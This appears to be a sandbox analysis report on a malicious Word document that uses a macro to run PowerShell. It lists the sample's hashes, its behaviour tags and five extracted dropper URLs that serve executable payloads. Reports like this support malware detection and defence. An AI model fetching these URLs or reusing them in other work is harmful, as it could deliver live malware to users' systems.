Overview

overview

10

Static

static

8

ed263a7838...18.doc

windows7-x64

10

ed263a7838...18.doc

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ed263a78384f69cde5daa07fe61dc990_JaffaCakes118

  • Size

    147KB

  • Sample

    240920-jstajswcrh

  • MD5

    ed263a78384f69cde5daa07fe61dc990

  • SHA1

    27f54e69c2c3ac5b480907548104215d72273aca

  • SHA256

    75ed06f8a1cd5fae3d642273b0ab549d634b59ca55f6648e8d0f0c5f6896b7da

  • SHA512

    194620b1ef3c5de5e271c3c9accb792f51413efac5635228fe6b6a80e70dbad0c43a1a07925e7a6c023aae4af1b25f4d648db84bcc8a8c0526697b1bff34a3cc

  • SSDEEP

    1536:WFR81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9wq60WflV:88GhDS0o9zTGOZD6EbzCd7QV

Score
10/10
discoveryexecutionmacro

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://162.243.7.179/wp-content/themes/alveophase3/msf-files/2NWAJq
exe.dropper

http://13.114.25.231/NF4
exe.dropper

http://arcelectricnj.com/D
exe.dropper

http://lakunat.ru/N
exe.dropper

http://paulofodra.com.br/t9Nf

Targets

    • Target

      ed263a78384f69cde5daa07fe61dc990_JaffaCakes118

    • Size

      147KB

    • MD5

      ed263a78384f69cde5daa07fe61dc990

    • SHA1

      27f54e69c2c3ac5b480907548104215d72273aca

    • SHA256

      75ed06f8a1cd5fae3d642273b0ab549d634b59ca55f6648e8d0f0c5f6896b7da

    • SHA512

      194620b1ef3c5de5e271c3c9accb792f51413efac5635228fe6b6a80e70dbad0c43a1a07925e7a6c023aae4af1b25f4d648db84bcc8a8c0526697b1bff34a3cc

    • SSDEEP

      1536:WFR81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9wq60WflV:88GhDS0o9zTGOZD6EbzCd7QV

    Score
    10/10
    discoveryexecution

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

      execution
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks